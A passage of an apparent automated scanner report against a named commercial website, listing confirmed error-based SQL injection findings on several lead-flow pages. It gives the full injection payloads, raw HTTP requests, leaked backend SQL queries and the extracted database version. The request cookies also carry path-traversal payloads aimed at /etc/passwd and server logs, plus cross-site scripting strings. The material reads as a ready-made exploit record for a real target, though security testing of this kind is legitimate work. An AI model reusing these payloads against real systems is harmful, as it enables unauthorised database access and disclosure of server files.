count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/meac00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3522e2gn69248r9u9l46vra1i5; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/inco00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5t438bp1gms1s6nmbhomprbig0; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 